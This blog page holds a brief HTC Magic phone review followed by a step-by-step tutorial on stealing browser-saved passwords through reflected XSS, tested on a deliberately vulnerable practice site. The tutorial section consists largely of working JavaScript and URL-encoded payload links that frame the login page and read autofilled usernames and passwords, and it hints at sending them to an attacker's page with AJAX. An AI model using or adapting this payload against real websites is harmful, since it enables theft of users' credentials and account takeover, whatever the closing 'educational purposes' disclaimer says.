What really impressed me, is the Google Maps and Street View, first Google Maps can show your location with a very high accuracy, Google Street View is sensitive to the compass, so whenever you turn you can see the other sides of the street too :

And if you are a fan of astronomy or wondering what's the name of that star, Google sky show real time/space information, check it out here :

What is good about HTC Magic :

  • YouTube™, Gmail™, Google Maps™, Google Talk™, Google Calendar™, Google™ Search… it’s just Google.
  • it’s Google Android, so all Google is in your pocket.
  • Android Market : anything you need, anytime you need
  • it’s fluid, fast, customizable
  • you can easily develop your own applications
  • gps and compass : you will never be lost again :)
  • microSD card : unlike the iPhone you can extend the storage of the HTC Magic anytime you want, it’s extensible to 32Go.
  • 3.2-inch touch-sensitive screen with HVGA (320 X 480 pixel) resolution.

What should HTC Magic improve :

  • compared to an iPhone, HTC Magic still not have the speed an iPhone have.
  • some Android Market problems : for me I can’t download applications when I’m on public insecure Wifi
  • the battery lifetime : should hold better than this
  • the Android support for a lot of languages : I can’t read Arabic for example on it

Well that was a quick tour covering 1% of what HTC Magic (aka Android G2) has to offer, for more information refer here :

Posted in , , , , , , , , , |

XSS, Passwords theft using JavaScript

Stealing passwords using XSS has been discovered long time ago, it mainly targeted the Firefox browser. Today in a boring afternoon weekend, I had the idea of a serious vulnerability targeting Google Chrome (I’ll test it and show it the next time) and I was thinking for the whole year that Firefox is not vulnerable to password theft anymore, especially with the new 3.5 version, but that’s not true, my test worked perfectly on Firefox and Chrome as well, but not Internet Explorer 8 thanks to it’s XSS filters as shown below.

Google Chrome 3.0chromexss

Firefox 3.5ffxss IE8


I used this website to test the password theft, it’s totally legal to do some hacking stuff in there, so feel free to mess around with it :).

First of all you need to register a new account in there (just for test, they will do a backup every 24 hours so your data will be lost).


after that you’ll be prompted if the browser save the password for you or not, hit yes since that’s the whole point behind all that


now we are ready, we need to locate an XSS vulnerability on the website, if you have already worked with XSS before, you will head directly to the search page, where 99% of XSS is.

Go to the search page and type this in the search field: <script>alert(‘hi, am XSS’)</script> , this is the Url of the request

something popped on the screen? nice, that’s XSS, say hi!


Now everything is ready, we need just a little JavaScript code to load the login page, read the stored password and send us the passwords back! so easy isn’t it?

Well it’s simple, first of all we create a frame and embed it to the current document html, to make things easy we will use the framset element like this:

var frameset = document.createElement('frameset');

inside that framset we will append a frame that will hold the login.asp html like follows

var frame1 = document.createElement('frame'); frame1.setAttribute('src','login.asp');

then we append that frameset to the current HTML document


We are almost done now, if you wonder what we just did, embed that JavaScript in the XSS vulnerability we just mentioned to see the result, here is the link:;var%20frame1%20=%20document.createElement%28%22frame%22%29;frame1.setAttribute%28%22src%22,%22login.asp%22%29;frameset.appendChild%28frame1%29;document.body.appendChild%28frameset%29;%3C/script%3E

now you can see a sweet login page embedded with the search page html, like you see in this picture the firebug inspected HTML


Having the login page accessible with JavaScript, nothing left but extracting the stored password and login, this is the JavaScript handling that :

function showLogin()
alert('login : ' + parent.frames[0].document.forms[0].elements[0].value + '\npass : '+parent.frames[0].document.forms[0].elements[1].value);

Well it’s quite simple also, parent is pointing to the current window, frames[0] is the login page, document.forms[0] is the login form in the login.asp page and the elements collection are the input controls (login and password) as you can see in the following firebug screenshot:


well that’s it, this is the full JavaScript that is used to steal passwords:

var frameset = document.createElement('frameset');
var frame1 = document.createElement('frame');


function showLogin()
alert('login : ' + parent.frames[0].document.forms[0].elements[0].value + '\npass : '+parent.frames[0].document.forms[0].elements[1].value);

You might notice the setTimeout(showLogin,1000); line, actually this makes the browser waits 1 second (1000 millisecond) before executing the showLogin function, this is because the login frame won’t load immediately when you embed it, so we wait a little before extracting information from it, for people with slow network speed, you may make the timeout a little more longer.

Here is the final result, use the following Url :;var%20frame1%20=%20document.createElement%28%22frame%22%29;document.body.appendChild%28frameset%29;frame1.setAttribute%28%22src%22,%22login.asp%22%29;frameset.appendChild%28frame1%29;setTimeout%28showLogin,1000%29;function%20showLogin%28%29{alert%28%22login%20:%20%22%20%2B%20parent.frames[0].document.forms[0].elements[0].value%20%2B%20%22\npass%20:%20%22%20%2B%20parent.frames[0].document.forms[0].elements[1].value%29}%3C/script%3E


Pretty simple and easy, if you wonder what’s next, then you might be looking at XSS for the first time. at this stage you can consider you have the victim’s password and login already, you can for example create a dynamic page that intercepts these data and saves it to a database where you can see it. you are wondering how to do that? well, AJAX can do that, I’m not going to show how you can request your page after you take control of the passwords, but it doesn’t take more than 2 minutes Googling it :)

well that’s it, I was living for more than a year now thinking that Firefox fixed that problem already by not showing the login and pass before the user focus on the field and choose the login like in this picture, but I was wrong. You can brute force this by predicting the first letter of the login anyways, the only benefit is that it will take long to get the login information.


//The information contained in this guide is for educational purposes only I cannot be held  responsible for anyone’s reaction to this post!

Posted in , , , , , |

Swedish Greys - a WordPress theme from Nordic Themepark. Converted by